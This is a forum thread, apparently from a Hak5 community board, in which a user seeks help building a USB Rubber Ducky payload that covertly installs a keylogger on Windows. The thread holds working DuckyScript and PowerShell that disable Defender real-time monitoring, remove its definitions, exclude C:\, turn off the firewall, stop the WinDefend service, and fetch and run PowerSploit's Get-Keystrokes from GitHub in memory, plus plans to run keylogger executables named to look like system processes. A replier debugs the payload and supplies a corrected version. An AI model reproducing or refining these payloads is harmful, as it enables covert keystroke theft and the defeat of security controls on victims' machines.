New Rubber Ducky - KeyLogger Script

Hello I recently purchased a rubber ducky and one of the power scripts that I want to add is a keylogger.I believe I tried all of the developed 

examples on the Hak5 site and I cant get by the Windows defender. I tried adding additional power scripts to shut down the defender prior to

the keylogger but it catches the code as dangerous virus and quarantines it. Can someone help me and show me the error of my ways.

Regards

Here is a snippet of code this one I get no error but it doesnt create a logger file and I dont find the ps1 file on the system.

There was some other examples that you sent the results via email but they stated you had to configure google a certain way but googkle doesnt allow that anymore.

so????

REM STAGE1
REM Title: PowerShell_Administrator
REM Target: Windows 10/11
REM Props: Hak5
REM Version: 1.0
REM GUI x brings up menu and the a selects PS admin
GUI x
DELAY 10
a
DELAY 10
TAB
DELAY 10
TAB
DELAY 10
ENTER

REM STAGE2 Windows Defender
REM attempts to disable defender
STRING Set-MpPreference -DisableRealtimeMonitoring $true;

REM STAGE 3 KeyLogger
REM What this does is it starts a powershell as a hidden window, so the actual application will not be visible on the taskbar. 
REM Only through the Task Manager. Then it downloads a simple script from github into memory, then executes the keylogger command.
REM The second to last line, after "-LogPath" input the location you want it to place the keylog file. And the "-Timeout" command 
REM is how many minutes you want to command to run.

STRING ATTACKMODE HID STORAGE
DELAY 100
ENTER
STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')
ENTER
DELAY 1000
ENTER
STRING Get-Keystrokes -LogPath C:\Users\User\Desktop\testing123.txt -Timeout 10DELAY 100
ENTER

First of all, I would recommend an initial DELAY in the payload, like:
DELAY 3000

Using DELAY 10 is pretty useless, better just skip them or create some DELAYs that makes a difference (i.e. with somewhat higher values).
The lowest value is actually 20
https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/delay#delay

Are you perhaps using a Windows installation that has another system language other than English?

Are you running with a user in the Windows system that can't be elevated to admin permissions?

Did you verify that real time monitoring actually is turned off? Create a payload that just contains "STAGE1" and "STAGE2" and check the Defender console if it really is disabled or not.

59 minutes ago, hbkahuna said:

I dont find the ps1 file on the system

as the comments in the payload says; "it downloads a simple script from github into memory" so it shouldn't touch any storage device, that's perhaps why you can't find it (in case you refer to your local PC when saying "system")

The log path is local, so any "loot" won't be saved to the Ducky storage
Are you using a local account for the user on the PC or a online/Microsoft one? Directories (especially Desktop) aren't treated the same for these two kinds of users. Locations are different. Try some other more "generic" location, such as C:\tmp

The line
STRING Set-MpPreference -DisableRealtimeMonitoring $true;
has no ENTER following it which makes a mess
it's probably concatenated with the STRING that follows
which results in
Set-MpPreference -DisableRealtimeMonitoring $true;ATTACKMODE HID STORAGE
which I'm certain PowerShell will have issues to interpret

Not sure what this line is supposed to do. It just writes out that string
If in need of changing the ATTACKMODE it should be only
ATTACKMODE HID STORAGE
However, I don't really see the need of that since the payload already is in ATTACKMODE HID and it's never using STORAGE so kinda obsolete

There's also probably a typo on the second to last line in the payload
"STRING Get-Keystrokes -LogPath C:\Users\User\Desktop\testing123.txt -Timeout 10DELAY 100"
the "DELAY 100" in the end of the line should most likely be a line of itself (not sure why it's there though since it's the last line of the payload)

For the payload in general, every STRING line that has a line that follows that says ENTER could be substituted with STRINGLN (and remove the ENTER LINE)

Last but not least, I'm not really a fan of payloads that try to disable local AV since it's most often not a valid use case scenario in the real world. Either the computer is running with a user that can't make these kinds of changes (such as turn off AV protection) or those kinds of things gets logged and triggers red alerts for the blue team.

I would probably write the payload something like this (haven't tried it though)

DELAY 3000

REM STAGE 1
GUI x
DELAY 50
a
REM The above could be/should be; STRING a
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
ENTER

REM STAGE 2
STRINGLN Set-MpPreference -DisableRealtimeMonitoring $true;

REM STAGE 3
DELAY 100
STRINGLN IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')
DELAY 1000
STRINGLN Get-Keystrokes -LogPath C:\Users\User\Desktop\testing123.txt -Timeout 10

Thankyou for your comments, I found I first had to get past my widow defender and another anti-virus. You got me onthe right solution path, I am surprised that the videos and all of the conversations don't mention that elephant in the room. I did the following and it did the trick. I will just show that snipet . Then back to keylogger which I think will work.. Im going to play with the delays and why a few of the key commands are there but Im just happy I got

past the anti-virus.

be good to go but thanks again!

DELAY 750  
GUI r 
DELAY 1000
STRING powershell Start-Process notepad -Verb runAs
ENTER
DELAY 750  
ALT y 
DELAY 750  
ENTER
ALT SPACE 
DELAY 1000
ENTER
STRING m 
ENTER
DELAY 1000
DOWNARROW
REPEAT 100
ENTER
STRING netsh advfirewall set allprofiles state off  
ENTER 

STRING Remove-Item $MyINvocation.InvocationName 
ENTER
CTRL s
ENTER
DELAY 1000
STRING C:\Windows\config-59657.ps1
ENTER
DELAY 1000
ALT F4 
DELAY 750  
GUI r 
DELAY 750  
STRING powershell Start-Process cmd -Verb runAs 
ENTER
DELAY 750  
ALT y 
ENTER
DELAY 1000
STRING mode con:cols=14 lines=1 
ENTER
ALT SPACE 
DELAY 750  
STRING m 
ENTER
DELAY 750   
DOWNARROW 
REPEAT 100
ENTER
STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false
ENTER

Ive trimmed the code quite a bit. I have a new issue that I have tried a number of things that dont work wondering if anyone else has solved the path is null issue:

Here is the updated code:

DELAY 3000

REM STAGE 1  Start your engines********************
GUI x
DELAY 500
STRINGLN a
DELAY 1000

ATTACKMODE HID
DELAY 500

REM STAGE 2  Stop Windows Defender Anti Virus********
REM STRINGLN Set-MpPreference -DisableRealtimeMonitoring $true;
REM STRINGLN powershell.exe -Command "& {Set-ExecutionPolicy-ExecutionPolicy REM Unrestricted}"
DELAY 1000
STRINGLN cd "c:\program files\windows defender"; ".\mpcmdrun.exe -RemoveDefinitions -All Set-MpPreference - Disable!OAVProtection $true";
DELAY 1000
STRINGLN ".\mpcmdrun.exe Add-MpPreference-ExclusionPath c:\";
DELAY 500
STRINGLN Set-MpPreference -DisableRealtimeMonitoring $true;
DELAY 1000
STRINGLN netsh advfirewall set allprofiles state off  
DELAY 1000
STRINGLN Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false
DELAY 1000
SHIFT y
DELAY 500
ENTER;

REM Stage 2 KeyLogger***********************************************************
REM DK is the RubberDuckey Label 
REM Notes at end of script about KeyLogger

DELAY 1000
STRINGLN $u=gwmi Win32_Volume|?{$_.Label -eq'DK'}|select name;cd $u.name;

GET ERROR here....cd : Cannot process argument because the value of argument "path" is null. Change the value of argument "path" to a
non-null value.

DELAY 1000
STRINGLN powershell "& 'Rundll33.exe'; 'svchosts.exe'; Keylogger
DELAY 1000

That way of populating $u should work. Is your Ducky really using 'DK' as its label (and not the default 'DUCKY' label)?

Alternatives to try (if the Ducky label of 'DK' is correct) might be:

$u = Get-WmiObject -Class Win32_Volume | where {$_.Label -eq "DK"} | select -expand name

or

$u = (gwmi win32_volume -f 'label=''DK''').Name

ok I have solved all the issues the final part is running the keylogger exe's There is one item busting me and thats the service antimalware.  It was giving me an error that the executables had a virus . So I used task manager to see what I may of missed killing and theres a antimalware that is running.  I try killing it and I get the same error not allowed.  The line of code is  Stop-Service -Force -Name "WinDefend"

Im wondering if I need to  somehow add the two executables  as expectable files ?? Would appreciated some help Im on the 5 yard line so to speak

Archived